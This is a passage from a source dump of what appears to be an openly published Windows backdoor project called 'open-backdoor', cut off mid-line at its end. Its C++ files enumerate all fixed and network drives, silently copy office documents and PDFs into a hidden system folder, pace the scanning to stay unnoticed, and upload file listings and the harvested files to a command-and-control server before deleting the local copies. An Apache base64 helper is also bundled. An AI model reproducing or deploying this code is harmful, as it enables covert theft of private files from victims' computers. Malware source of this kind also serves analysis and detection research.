| sprintf(szLog, "[Computer]\nName=%s\nPage=%u\n", g_szHostname, GetACP()); 37 | fwrite(szLog, 1, strlen(szLog), f); 38 | 39 | sprintf(szLog, "[%s]\n", g_szHostname); 40 | fwrite(szLog, 1, strlen(szLog), f); 41 | 42 | CHAR szDirIndex[260]; 43 | CHAR szDirPath[260]; 44 | 45 | int nDirCount = GetPrivateProfileInt("ScanList", "dircount", 0, g_szDNList); 46 | for (int i = 1; i <= nDirCount; ++i) 47 | { 48 | sprintf(szDirIndex, "d%d", i); 49 | GetPrivateProfileString("ScanList", szDirIndex, g_szBlank, szDirPath, 256, g_szDNList); 50 | 51 | CHAR szDirLog[260]; 52 | sprintf(szDirLog, "d%d=%s\n", i, szDirPath); 53 | fwrite(szDirLog, 1, strlen(szDirLog), f); 54 | } 55 | 56 | CHAR szDirCount[260]; 57 | sprintf(szDirCount, "dircount=%d\n", nDirCount); 58 | fwrite(szDirCount, 1, strlen(szDirCount), f); 59 | 60 | for(int k = 1; k <= nDirCount; k++) 61 | { 62 | sprintf(szDirIndex, "d%d", k); 63 | GetPrivateProfileString("ScanList", szDirIndex, g_szBlank, szDirPath, 256, g_szDNList); 64 | 65 | if (szDirPath[strlen(szDirPath) - 1] != '\\') 66 | sprintf(szDirPath, "%s\\", szDirPath); 67 | 68 | LogFolderContent(szDirPath, f); 69 | RecursiveFolderScan(szDirPath, f); 70 | } 71 | 72 | fclose(f); 73 | } 74 | else 75 | { 76 | RecursiveDriveScan(); 77 | } 78 | 79 | GetLocalTime(&lpSystemTime); 80 | sprintf(szNowTime, "%04u-%02u-%02u", lpSystemTime.wYear, lpSystemTime.wMonth, lpSystemTime.wDay); 81 | 82 | WritePrivateProfileString("EnumTime", "DateTime", szNowTime, g_szDNList); 83 | WritePrivateProfileString("ScanList", "ScanAll", "False", g_szDNList); 84 | 85 | return TRUE; 86 | } 87 | 88 | // Retrive all the devices connected and dump the device's content recursively 89 | void RecursiveDriveScan() 90 | { 91 | int nDriveCount = 0; 92 | 93 | CHAR szLogicalDrive[260] = {}; 94 | DWORD dwLogicalDriveLen = GetLogicalDriveStrings(260, szLogicalDrive); 95 | if (0 == dwLogicalDriveLen || dwLogicalDriveLen > 260) 96 | return; 97 | 98 | FILE *f = fopen(g_szEnumFS, "w"); 99 | if (NULL == f) 100 | return; 101 | 102 | CHAR szLog[292]; 103 | sprintf(szLog, "[Computer]\nName=%s\nPage=%u\n", g_szHostname, GetACP()); 104 | fwrite(szLog, 1, strlen(szLog), f); 105 | sprintf(szLog, "[%s]\n", g_szHostname); 106 | fwrite(szLog, 1, strlen(szLog), f); 107 | 108 | for (LPCSTR i = szLogicalDrive; *i != NULL; i += 4) 109 | { 110 | if (GetDriveType(i) == DRIVE_FIXED || GetDriveType(i) == DRIVE_REMOTE) 111 | { 112 | CHAR szDriveLog[260]; 113 | 114 | sprintf(szDriveLog, "d%d=%s\n", ++nDriveCount, i); 115 | fwrite(szDriveLog, 1, strlen(szDriveLog), f); 116 | } 117 | } 118 | 119 | CHAR szDirCountLog[260]; 120 | sprintf(szDirCountLog, "dircount=%d\n", nDriveCount); 121 | fwrite(szDirCountLog, 1, strlen(szDirCountLog), f); 122 | 123 | for (LPCSTR k = szLogicalDrive; *k != NULL; k += 4) 124 | { 125 | if (GetDriveType(k) == DRIVE_FIXED || GetDriveType(k) == DRIVE_REMOTE) 126 | { 127 | LogFolderContent(k, f); 128 | RecursiveFolderScan(k, f); 129 | } 130 | } 131 | 132 | fclose(f); 133 | } 134 | 135 | void RecursiveFolderScan(const char *lpszRootDir, FILE *f) 136 | { 137 | WIN32_FIND_DATA FindFileData; 138 | 139 | CHAR szDirPattern[260]; 140 | sprintf(szDirPattern, "%s*.*", lpszRootDir); 141 | 142 | HANDLE hFindFile = FindFirstFile(szDirPattern, &FindFileData); 143 | if (INVALID_HANDLE_VALUE == hFindFile) 144 | return; 145 | 146 | do 147 | { 148 | if (_stricmp(FindFileData.cFileName, ".") && _stricmp(FindFileData.cFileName, "..")) 149 | { 150 | if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) 151 | { 152 | CHAR szDirName[260]; 153 | CHAR szDirPath[260]; 154 | 155 | strcpy(szDirName, FindFileData.cFileName); 156 | sprintf(szDirPath, "%s%s\\", lpszRootDir, szDirName); 157 | 158 | LogFolderContent(szDirPath, f); 159 | RecursiveFolderScan(szDirPath, f); 160 | } 161 | } 162 | } 163 | while (FindNextFile(hFindFile, &FindFileData)); 164 | 165 | FindClose(hFindFile); 166 | } 167 | 168 | void LogFolderContent(const char *lpszRootDir, FILE *f) 169 | { 170 | WIN32_FIND_DATA FindFileData; 171 | 172 | int nDirCount = 0; 173 | int nFileCount = 0; 174 | 175 | CHAR szLegend[260]; 176 | sprintf(szLegend, "[%s]\n", lpszRootDir); 177 | fwrite(szLegend, 1, strlen(szLegend), f); 178 | 179 | CHAR szDirPattern[260]; 180 | sprintf(szDirPattern, "%s*.*", lpszRootDir); 181 | 182 | HANDLE hFindFile = FindFirstFile(szDirPattern, &FindFileData); 183 | if (INVALID_HANDLE_VALUE == hFindFile) 184 | return; 185 | 186 | do 187 | { 188 | if (_stricmp(FindFileData.cFileName, ".") && _stricmp(FindFileData.cFileName, "..")) 189 | { 190 | if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) 191 | { 192 | CHAR szDirName[260]; 193 | CHAR szDirLog[260]; 194 | 195 | strcpy(szDirName, FindFileData.cFileName); 196 | sprintf(szDirLog, "d%d=%s\n", ++nDirCount, szDirName); 197 | 198 | fwrite(szDirLog, 1, strlen(szDirLog), f); 199 | } 200 | else 201 | { 202 | CHAR szFileName[260]; 203 | CHAR szFileLog[260]; 204 | 205 | strcpy(szFileName, FindFileData.cFileName); 206 | sprintf(szFileLog, "f%d=%s\n", ++nFileCount, szFileName); 207 | 208 | fwrite(szFileLog, 1, strlen(szFileLog), f); 209 | } 210 | 211 | if (++g_dwScannedFile2 >= 1000) 212 | { 213 | g_dwScannedFile2 = 0; 214 | Sleep(9000); 215 | } 216 | } 217 | } 218 | while (FindNextFile(hFindFile, &FindFileData)); 219 | 220 | FindClose(hFindFile); 221 | 222 | CHAR szDirCount[260]; 223 | CHAR szFileCount[260]; 224 | 225 | sprintf(szDirCount, "dircount=%d\n", nDirCount); 226 | sprintf(szFileCount, "filecount=%d\n", nFileCount); 227 | 228 | fwrite(szDirCount, 1, strlen(szDirCount), f); 229 | fwrite(szFileCount, 1, strlen(szFileCount), f); 230 | } -------------------------------------------------------------------------------- /open-backdoor/recursive.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "recursive.hpp" 6 | 7 | #include 8 | #include "StdAfx.hpp" 9 | #include "c2.hpp" 10 | #include "recursive.hpp" 11 | 12 | #ifndef NO_HASH_MD5 13 | #include "md5++.hpp" 14 | #endif 15 | 16 | BOOL SendUEnumFSToC2() 17 | { 18 | HANDLE hFile = CreateFile(g_szUEnumFS, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 19 | if (INVALID_HANDLE_VALUE == hFile) 20 | return FALSE; 21 | 22 | CloseHandle(hFile); 23 | 24 | time_t tTime; 25 | time(&tTime); 26 | struct tm *lpLocalTime = localtime(&tTime); 27 | 28 | CHAR szUFileList[260]; 29 | sprintf(szUFileList, 30 | "UFileList-%02u%02u-%02u%02u%02u.ini", 31 | lpLocalTime->tm_mon + 1, 32 | lpLocalTime->tm_mday, 33 | lpLocalTime->tm_hour, 34 | lpLocalTime->tm_min, 35 | lpLocalTime->tm_sec 36 | ); 37 | 38 | return SendFileToC2(g_szUEnumFS, szUFileList); 39 | } 40 | 41 | void RecursiveFileSearch(const char *lpszUnit, FILE *f) 42 | { 43 | int nFileIndex = 0; 44 | int nDirIndex = 0; 45 | #ifndef NO_HASH_MD5 46 | CMD5 lpMD5; 47 | #endif 48 | 49 | CHAR szLog[268]; 50 | sprintf(szLog, "[%s]\n", lpszUnit); 51 | fwrite(szLog, 1, strlen(szLog), f); 52 | 53 | CHAR FileName[260]; 54 | sprintf(FileName, "%s*.*", lpszUnit); 55 | 56 | WIN32_FIND_DATA FindFileData; 57 | HANDLE hFindFile = FindFirstFile(FileName, &FindFileData); 58 | if (INVALID_HANDLE_VALUE != hFindFile) 59 | { 60 | do 61 | { 62 | if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) 63 | { 64 | if (_stricmp(FindFileData.cFileName, ".") && _stricmp(FindFileData.cFileName, "..")) 65 | { 66 | sprintf(szLog, "d%d=%s\n", ++nDirIndex, FindFileData.cFileName); 67 | fwrite(szLog, 1, strlen(szLog), f); 68 | } 69 | } 70 | else 71 | { 72 | sprintf(szLog, "f%d=%s\n", ++nFileIndex, FindFileData.cFileName); 73 | fwrite(szLog, 1, strlen(szLog), f); 74 | 75 | if (TRUE == g_bUAuto) 76 | { 77 | CHAR szFileExtLow[260] = {}; 78 | 79 | char *szFileExt = strrchr(FindFileData.cFileName, '.'); 80 | if (NULL != szFileExt) 81 | { 82 | sprintf(szFileExtLow, "%s", szFileExt + 1); 83 | _strlwr(szFileExtLow); 84 | } 85 | 86 | BOOL bAcceptedType = TRUE; 87 | if (TRUE == g_bUTypeLimit) 88 | { 89 | CHAR szAcceptedTypes[260]; 90 | CHAR szFileType[260]; 91 | 92 | sprintf(szAcceptedTypes, ",%s,", g_szAcceptedFileTypes); 93 | sprintf(szFileType, ",%s,", szFileExtLow); 94 | 95 | if (!strstr(szAcceptedTypes, szFileType)) 96 | bAcceptedType = FALSE; 97 | } 98 | 99 | BOOL bAcceptedSize = TRUE; 100 | if (g_dwMaxFileSizeKB && (FindFileData.nFileSizeLow > g_dwMaxFileSizeKB << 10 || FindFileData.nFileSizeHigh)) 101 | bAcceptedSize = FALSE; 102 | 103 | if (bAcceptedType && bAcceptedSize) 104 | { 105 | SYSTEMTIME SystemTime; 106 | FileTimeToSystemTime(&FindFileData.ftLastWriteTime, &SystemTime); 107 | 108 | char szFileTimestamp[284]; 109 | sprintf( 110 | szFileTimestamp, 111 | "%s %d-%02d-%02d %02d:%02d:%02d:%03d", 112 | FindFileData.cFileName, 113 | SystemTime.wYear, 114 | SystemTime.wMonth, 115 | SystemTime.wDay, 116 | SystemTime.wHour, 117 | SystemTime.wMinute, 118 | SystemTime.wSecond, 119 | SystemTime.wMilliseconds 120 | ); 121 | 122 | CHAR szUniqueFilePath[260]; 123 | #ifndef NO_HASH_MD5 124 | sprintf(szUniqueFilePath, "%s", lpMD5.GetStringMD5(szFileTimestamp)); 125 | #else 126 | sprintf(szUniqueFilePath, "%s", FindFileData.cFileName); 127 | #endif 128 | Sleep(1); 129 | 130 | // Check if file has been changed 131 | if (!GetPrivateProfileInt("Index", szUniqueFilePath, 0, g_szUDIdx)) 132 | { 133 | CHAR szTmpName[260]; 134 | sprintf( 135 | szTmpName, 136 | "%sU%d-%02d-%02d-%02d-%02d-%s", 137 | g_szTmpPath, 138 | SystemTime.wYear, 139 | SystemTime.wMonth, 140 | SystemTime.wDay, 141 | SystemTime.wHour, 142 | SystemTime.wMinute, 143 | szUniqueFilePath 144 | ); 145 | 146 | if (szFileExt) 147 | strcat(szTmpName, szFileExt); 148 | 149 | CHAR szFilePath[260]; 150 | sprintf(szFilePath, "%s%s", lpszUnit, FindFileData.cFileName); 151 | 152 | Sleep(1); 153 | if (CopyFile(szFilePath, szTmpName, 0)) 154 | { 155 | SetFileAttributes(szTmpName, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); 156 | WritePrivateProfileString("Index", szUniqueFilePath, "1", g_szUDIdx); 157 | } 158 | } 159 | } 160 | } 161 | } 162 | 163 | if (++g_dwScannedFile >= 1000) 164 | { 165 | g_dwScannedFile = 0; 166 | Sleep(9000); 167 | } 168 | } 169 | while (FindNextFile(hFindFile, &FindFileData)); 170 | 171 | FindClose(hFindFile); 172 | } 173 | 174 | sprintf(szLog, "filecount=%d\n", nFileIndex); 175 | fwrite(szLog, 1, strlen(szLog), f); 176 | 177 | sprintf(szLog, "dircount=%d\n", nDirIndex); 178 | fwrite(szLog, 1, strlen(szLog), f); 179 | 180 | // Next directory 181 | HANDLE hFindDir = FindFirstFile(FileName, &FindFileData); 182 | if (INVALID_HANDLE_VALUE != hFindDir) 183 | { 184 | do 185 | { 186 | if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY 187 | && _stricmp(FindFileData.cFileName, ".") 188 | && _stricmp(FindFileData.cFileName, "..")) 189 | { 190 | sprintf(szLog, "%s%s\\", lpszUnit, FindFileData.cFileName); 191 | RecursiveFileSearch(szLog, f); 192 | } 193 | } 194 | while (FindNextFile(hFindDir, &FindFileData)); 195 | FindClose(hFindDir); 196 | } 197 | } 198 | 199 | void ScanDevice(const char *lpszUnit) 200 | { 201 | CHAR szUnitCpy[260]; 202 | CHAR lpBuf64[292]; 203 | 204 | GetPrivateProfileString("Other", "UTypeLimit", "True", lpBuf64, 64, g_szDNList); 205 | g_bUTypeLimit = _stricmp(lpBuf64, "True") == 0; 206 | 207 | GetPrivateProfileString("Other", "UAuto", "False", lpBuf64, 64, g_szDNList); 208 | g_bUAuto = _stricmp(lpBuf64, "True") == 0; 209 | 210 | if (TRUE == g_bUTypeLimit) 211 | { 212 | GetPrivateProfileString("Other", "Types", "doc,docx,xls,xlsx,txt,rtf,pdf", g_szAcceptedFileTypes, 64, g_szDNList); 213 | _strlwr(g_szAcceptedFileTypes); 214 | } 215 | 216 | if (TRUE == g_bUAuto) 217 | { 218 | if (TRUE == CreateDirectory(g_szTmpPath, NULL)) 219 | SetFileAttributes(g_szTmpPath, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN); 220 | else if (ERROR_ALREADY_EXISTS != GetLastError()) 221 | return; 222 | } 223 | 224 | g_dwScannedFile = 0; 225 | 226 | FILE *f = fopen(g_szUEnumFS, "w"); 227 | if (NULL != f) 228 | { 229 | sprintf(lpBuf64, "[Computer]\nName=%s\nPage=%u\n", g_szHostname, GetACP()); 230 | fwrite(lpBuf64, 1, strlen(lpBuf64), f); 231 | 232 | sprintf(lpBuf64, "[%s]\n", g_szHostname); 233 | fwrite(lpBuf64, 1, strlen(lpBuf64), f); 234 | 235 | strcpy(szUnitCpy, lpszUnit); 236 | if (strlen(szUnitCpy) > 3) 237 | { 238 | if (szUnitCpy[strlen(szUnitCpy) - 1] == '\\') 239 | szUnitCpy[strlen(szUnitCpy) - 1] = 0; 240 | } 241 | 242 | sprintf(lpBuf64, "d1=%s\ndircount=1\n", szUnitCpy); 243 | fwrite(lpBuf64, 1, strlen(lpBuf64), f); 244 | 245 | RecursiveFileSearch(lpszUnit, f); 246 | 247 | fclose(f); 248 | } 249 | } 250 | 251 | void SendTmpFolderToC2() 252 | { 253 | CHAR szTmpPath[260]; 254 | sprintf(szTmpPath, "%s*.*", g_szTmpPath); 255 | 256 | WIN32_FIND_DATA FindFileData; 257 | HANDLE hFindFile = FindFirstFile(szTmpPath, &FindFileData); 258 | if (INVALID_HANDLE_VALUE != hFindFile) 259 | { 260 | do 261 | { 262 | if (!(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) 263 | { 264 | CHAR szFileTmp[260]; 265 | sprintf(szFileTmp, "%s%s", g_szTmpPath, FindFileData.cFileName); 266 | 267 | if (SendFileToC2(szFileTmp, FindFileData.cFileName)) 268 | DeleteFile(szFileTmp); 269 | } 270 | } 271 | while (FindNextFile(hFindFile, &FindFileData)); 272 | 273 | FindClose(hFindFile); 274 | } 275 | } -------------------------------------------------------------------------------- /open-backdoor/3rd-party/base64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 | * 8 | * This file contains Original Code and/or Modifications of Original Code 9 | * as defined in and that are subject to the Apple Public Source License 10 | * Version 2.0 (the 'License'). You may not use this file except in 11 | * compliance with the License. Please obtain a copy of the License at 12 | * http://www.opensource.apple.com/apsl/ and read it before using this 13 | * file. 14 | * 15 | * The Original Code and all software distributed under the License are 16 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 | * Please see the License for the specific language governing rights and 21 | * limitations under the License. 22 | * 23 | * @APPLE_LICENSE_HEADER_END@ 24 | */ 25 | /* ==================================================================== 26 | * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 | * 28 | * Redistribution and use in source and binary forms, with or without 29 | * modification, are permitted provided that the following conditions 30 | * are met: 31 | * 32 | * 1. Redistributions of source code must retain the above copyright 33 | * notice, this list of conditions and the following disclaimer. 34 | * 35 | * 2. Redistributions in binary form must reproduce the above copyright 36 | * notice, this list of conditions and the following disclaimer in 37 | * the documentation and/or other materials provided with the 38 | * distribution. 39 | * 40 | * 3. All advertising materials mentioning features or use of this 41 | * software must display the following acknowledgment: 42 | * "This product includes software developed by the Apache Group 43 | * for use in the Apache HTTP server project (http://www.apache.org/)." 44 | * 45 | * 4. The names "Apache Server" and "Apache Group" must not be used to 46 | * endorse or promote products derived from this software without 47 | * prior written permission. For written permission, please contact 48 | * apache@apache.org. 49 | * 50 | * 5. Products derived from this software may not be called "Apache" 51 | * nor may "Apache" appear in their names without prior written 52 | * permission of the Apache Group. 53 | * 54 | * 6. Redistributions of any form whatsoever must retain the following 55 | * acknowledgment: 56 | * "This product includes software developed by the Apache Group 57 | * for use in the Apache HTTP server project (http://www.apache.org/)." 58 | * 59 | * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 | * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 | * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 | * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 | * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 | * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 | * OF THE POSSIBILITY OF SUCH DAMAGE. 71 | * ==================================================================== 72 | * 73 | * This software consists of voluntary contributions made by many 74 | * individuals on behalf of the Apache Group and was originally based 75 | * on public domain software written at the National Center for 76 | * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 | * For more information on the Apache Group and the Apache HTTP server 78 | * project, please see . 79 | * 80 | */ 81 | 82 | /* Base64 encoder/decoder. Originally Apache file ap_base64.c 83 | */ 84 | 85 | #include 86 | 87 | #include "base64.h" 88 | 89 | /* aaaack but it's fast and const should make it shared text page. */ 90 | static const unsigned char pr2six[256] = 91 | { 92 | /* ASCII table */ 93 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 94 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 95 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 96 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 97 | 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 98 | 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 99 | 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 100 | 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 101 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 102 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 103 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 104 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 105 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 106 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 107 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 108 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 109 | }; 110 | 111 | int Base64decode_len(const char *bufcoded) 112 | { 113 | int nbytesdecoded; 114 | register const unsigned char *bufin; 115 | register int nprbytes; 116 | 117 | bufin = (const unsigned char *) bufcoded; 118 | while (pr2six[*(bufin++)] <= 63); 119 | 120 | nprbytes = (bufin - (const unsigned char *) bufcoded) - 1; 121 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 122 | 123 | return nbytesdecoded + 1; 124 | } 125 | 126 | int Base64decode(char *bufplain, const char *bufcoded) 127 | { 128 | int nbytesdecoded; 129 | register const unsigned char *bufin; 130 | register unsigned char *bufout; 131 | register int nprbytes; 132 | 133 | bufin = (const unsigned char *) bufcoded; 134 | while (pr2six[*(bufin++)] <= 63); 135 | nprbytes = (bufin - (const unsigned char *) bufcoded) - 1; 136 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 137 | 138 | bufout = (unsigned char *) bufplain; 139 | bufin = (const unsigned char *) bufcoded; 140 | 141 | while (nprbytes > 4) { 142 | *(bufout++) = 143 | (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 144 | *(bufout++) = 145 | (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 146 | *(bufout++) = 147 | (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 148 | bufin += 4; 149 | nprbytes -= 4; 150 | } 151 | 152 | /* Note: (nprbytes == 1) would be an error, so just ingore that case */ 153 | if (nprbytes > 1) { 154 | *(bufout++) = 155 | (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 156 | } 157 | if (nprbytes > 2) { 158 | *(bufout++) = 159 | (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 160 | } 161 | if (nprbytes > 3) { 162 | *(bufout++) = 163 | (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 164 | } 165 | 166 | *(bufout++) = '\0'; 167 | nbytesdecoded -= (4 - nprbytes) & 3; 168 | return nbytesdecoded; 169 | } 170 | 171 | static const char basis_64[] = 172 | "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 173 | 174 | int Base64encode_len(int len) 175 | { 176 | return ((len + 2) / 3 * 4) + 1; 177 | } 178 | 179 | int Base64encode(char *encoded, const char *string, int len) 180 | { 181 | int i; 182 | char *p; 183 | 184 | p = encoded; 185 | for (i = 0; i < len - 2; i += 3) { 186 | *p++ = basis_64[(string[i] >> 2) & 0x3F]; 187 | *p++ = basis_64[((string[i] & 0x3) << 4) | 188 | ((int) (string[i + 1] & 0xF0) >> 4)]; 189 | *p++ = basis_64[((string[i + 1] & 0xF) << 2) | 190 | ((int) (string[i + 2] & 0xC0) >> 6)]; 191 | *p++ = basis_64[string[i + 2] & 0x3F]; 192 | } 193 | if (i < len) { 194 | *p++ = basis_64[(string[i] >> 2) & 0x3F]; 195 | if (i == (len - 1)) { 196 | *p++ = basis_64[((string[i] & 0x3) << 4)]; 197 | *p++ = '='; 198 | } 199 | else { 200 | *p++ = basis_64[((string[i] & 0x3) << 4) | 201 | ((int) (string[i + 1] & 0xF0) >> 4)]; 202 | *p++ = basis_64[((string[i + 1] & 0xF) << 2)]; 203 | } 204 | *p++ = '='; 205 | } 206 | 207 | *p++ = '\0'; 208 | return p - encoded; 209 | } 210 | -------------------------------------------------------------------------------- /open-backdoor/config.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "config.hpp" 6 | 7 | #include 8 | #include "StdAfx.hpp" 9 | 10 | BOOL PropagateConfig() 11 | { 12 | HANDLE hStat_T = CreateFile(g_szStat_T, 13 | GENERIC_READ, 14 | FILE_SHARE_READ, 15 | NULL, 16 | OPEN_EXISTING, 17 | FILE_ATTRIBUTE_NORMAL, 18 | NULL 19 | ); 20 | if (INVALID_HANDLE_VALUE == hStat_T) 21 | return FALSE; 22 | 23 | CloseHandle(hStat_T); 24 | 25 | HANDLE hDNList = CreateFile(g_szDNList, 26 | GENERIC_READ | GENERIC_WRITE, 27 | FILE_SHARE_READ | FILE_SHARE_WRITE, 28 | NULL, 29 | CREATE_ALWAYS, 30 | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, 31 | NULL 32 | ); 33 | if (INVALID_HANDLE_VALUE == hDNList) 34 | return FALSE; 35 | 36 | CloseHandle(hDNList); 37 | 38 | int k = 0; 39 | 40 | // ------------------ GET INFO FROM STAT_T ------------------ 41 | Sleep(10); 42 | int nDirCount = GetPrivateProfileInt("Download", "dircount", 0, g_szStat_T); 43 | 44 | Sleep(10); 45 | int nFileCount = GetPrivateProfileInt("Download", "filecount", 0, g_szStat_T); 46 | 47 | Sleep(10); 48 | int nScanDirCount = GetPrivateProfileInt("Scan", "dircount", 0, g_szStat_T); 49 | 50 | // ------------------ COPY DOWNLOAD FILE INDEXES ------------------ 51 | CHAR szDownloadFile[260]; 52 | CHAR szFileIndex1[260]; 53 | CHAR szFileIndex2[260]; 54 | 55 | for (int i = 1; i < nFileCount; i++) 56 | { 57 | sprintf(szFileIndex1, "f%d", i); 58 | sprintf(szFileIndex2, "f%d", ++k); 59 | 60 | GetPrivateProfileString("Download", szFileIndex1, g_szBlank, szDownloadFile, 256, g_szStat_T); 61 | WritePrivateProfileString("Filelist", szFileIndex2, szDownloadFile, g_szDNList); 62 | } 63 | 64 | // ------------------ COPY DOWNLOAD DIRECTORY INDEXES ------------------ 65 | CHAR szDirIndex[260]; 66 | CHAR szDownloadDir[260]; 67 | 68 | for (int l = 1; l <= nDirCount; ++l) 69 | { 70 | sprintf(szDirIndex, "d%d", l); 71 | GetPrivateProfileString("Download", szDirIndex, g_szBlank, szDownloadDir, 256, g_szStat_T); 72 | 73 | GetFolderFirstLevel(szDownloadDir, &k); 74 | GetFolderRecursive(szDownloadDir, &k); 75 | } 76 | 77 | // ------------------ WRITE TOTAL FILE COUNT ------------------ 78 | CHAR szFileTotal[260]; 79 | 80 | sprintf(szFileTotal, "%d", k); 81 | WritePrivateProfileString("Filelist", "filetotal", szFileTotal, g_szDNList); 82 | 83 | // ------------------ COPY SCAN DIRECTORY INDEXES ------------------ 84 | int j = 0; 85 | 86 | for (; j < nScanDirCount; j++) 87 | { 88 | sprintf(szDirIndex, "d%d", j + 1); 89 | 90 | GetPrivateProfileString("Scan", szDirIndex, g_szBlank, szDownloadDir, 256, g_szStat_T); 91 | WritePrivateProfileString("ScanList", szDirIndex, szDownloadDir, g_szDNList); 92 | } 93 | 94 | // ------------------ WRITE TOTAL DIRECTORY COUNT ------------------ 95 | CHAR szScanDirCount[260]; 96 | 97 | sprintf(szScanDirCount, "%d", j); 98 | WritePrivateProfileString("ScanList", "dircount", szScanDirCount, g_szDNList); 99 | 100 | // ------------------ COPY CONFIG TO DNLIST ------------------ 101 | CHAR szBuf512[512]; 102 | 103 | GetPrivateProfileString ("Scan", "ScanAll", "False", szBuf512, 64, g_szStat_T); 104 | WritePrivateProfileString ("ScanList", "ScanAll", szBuf512, g_szDNList); 105 | 106 | GetPrivateProfileString ("Other", "TypeLimit", "True", szBuf512, 64, g_szStat_T); 107 | WritePrivateProfileString ("Other", "TypeLimit", szBuf512, g_szDNList); 108 | 109 | GetPrivateProfileString ("Other", "USearch", "True", szBuf512, 64, g_szStat_T); 110 | WritePrivateProfileString ("Other", "USearch", szBuf512, g_szDNList); 111 | 112 | GetPrivateProfileString ("Other", "GSearch", "True", szBuf512, 64, g_szStat_T); 113 | WritePrivateProfileString ("Other", "GSearch", szBuf512, g_szDNList); 114 | 115 | GetPrivateProfileString ("Other", "UTypeLimit", "True", szBuf512, 64, g_szStat_T); 116 | WritePrivateProfileString ("Other", "UTypeLimit", szBuf512, g_szDNList); 117 | 118 | GetPrivateProfileString ("Other", "UAuto", "False", szBuf512, 64, g_szStat_T); 119 | WritePrivateProfileString ("Other", "UAuto", szBuf512, g_szDNList); 120 | 121 | GetPrivateProfileString ("Other", "Types", "doc,docx,xls,xlsx,txt,rtf,pdf", szBuf512, 64, g_szStat_T); 122 | WritePrivateProfileString ("Other", "Types", 